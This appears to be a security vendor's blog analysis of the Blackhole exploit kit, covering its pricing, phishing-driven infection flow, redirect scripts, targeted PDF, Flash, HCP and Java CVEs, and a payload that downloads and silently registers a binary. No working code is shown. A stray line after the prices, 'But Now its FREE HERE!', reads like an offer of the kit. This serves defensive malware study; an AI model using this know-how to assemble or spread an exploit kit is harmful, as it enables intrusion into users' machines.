Deconstructing the Black Hole Exploit Kit
This month, the science journal Nature published a story on the biggest black hole ever discovered by UC Berkeley researchers.
What is the biggest black hole in cyber space? Imperva’s malware dissection team took a careful look at the Black Hole Exploit kit anatomy. In addition to Tomer, Sarit has now joined the team to add a feminine touch to the dissection process.
The new black hole exploit kit has been out and we’ve had a chance to deconstruct it. Before we get super geeky, some general observations about the innovation in this kit:
- Malware developers continue to use the latest tools to encrypt their malware to evade anti-virus (AV) software. As usual, the encryption signature is new, avoiding AV—our analysis showed that 70 percent of AV software would miss this altogether. This serves as a not-so-gentle reminder the fundamental problem with signature based AV—it changes every week with the use of a new encryption algorithm.
- Hackers are deploying resiliency. In the past, we’ve seen hackers deploy a single exploit server. In this case, there were four that could be redirected if any of the URLs was taken down.
What are BEPs?
An exploit kit, a browser exploit pack (BEP) is a toolkit that automates the exploitation of client side vulnerabilities.
The toolkit is a bundle of PHP and HTML files with a list of exploit files (including JAVA, PDF, Browsers, Adobe Flash Player …etc) designed to target the operating system, browser or other client side application. Toolkits are usually heavily obfuscated using some known or unknown obfuscation and crypto algorithms tools to avoid detection by anti-virus vendors.
Black hole is yet another web exploit kit developed by Russian hackers. Blackhole is a very powerful kit with a number of recent exploits including Java and Adobe PDF exploits. One blog published (with updates) a great overview of the most known exploit packs.
According the Hacker News, the black market cost of the pack:
Users can purchase the annual license for $1500, semi-annual license for $1000, or just a quarterly license for $700. The license includes free software updates for the duration of the contract. For those malicious users with a commitment phobia the makers of the kit offer yet another solution. You can rent the kit (on the author’s servers) for $50 for 24 hours, $200 for 1 week, $300 for 2 weeks, $400 for 3 week, and $500 for 4 weeks. A domain name comes included with the rental agreement, but should you desire to change it you need to pay another $35. But Now its FREE HERE!
NOTE: For any pictures, click on them to BIGGIFY.
Summary: The Infection Flow
Here’s a breakdown of the infection flow:
The Infection Process
A live exploit pack only requires a victim “drive-by” – a trivial site visit – to start the infection process.
The most common method used by BlackHole to spread is via links inside phishing emails. We were no exception:
Once clicked, we get the infamous “WAIT PLEASE LOADING……” page.
We can immediately see the 4 JS.JS java scripts sources. Each JS.JS contains a redirection to a black hole exploit kit server.
We can see that the redirection is achieved by the JS document.location property:
Then, the exploit kit will check for vulnerable applications and will select the best exploit.
Deploying the payloads
The BEP searches for several vulnerabilities to propagate itself. By deobfuscating the above JS we can notice the following java scripts and functions that reveal the targets. We can see that the code is going to extract the versions of the following installed applications:
Here, the kit checks for the installed OS:
Here, the kit checks for a PDF exploitation (CVE-2008-2992/CVE-2009-0927):
Here, the kit checks for a flash exploitation (CVE-2011-0611):
Here, the kit gets a shellcode function:
Here, the kit checks for a HCP exploitation (CVE-2010-1885):
The Java JAR Payload
The exploit kit sends a heavily obfuscated JS code with a Java applet code that downloads a malicious JAR file to the infected system.
After uncompressing the jar file, 5 java class files are extracted:
I used JD decompiler to decompile the class files. Zoom.class attempts to exploit “CVE 2010-0840”:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE and Java for Business 6 Update 18, 5.0 Update 23, and 1.4.2_25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
- Once the vulnerability is successfully exploited the payload tries to download and save on the infected system another malicious binary (analysis later). Saves it with a random name <randomName>.exe
- Silently registers the downloaded binary as calling regsrv32.exe –s <binary.exe>
As noted above, the anti-virus payload detection is low, with 13 of 43 vendors catching it, a 30.2% success rate.
Successful Exploitation – The Malware
On every successful exploitation the running shellcode downloads and executes a malicious binary (a download / execute type of shellcode). We got infected twice.
Sample MD5: 53507987ca9d772c7377a6066259aa7e
Anubis Report: http://goo.gl/LCiCg
Ceeinject / Scar / Kazy
Sample MD5: ba7017bb86b8d37a37479d6460e992f0
Anubis Report: http://goo.gl/NUylt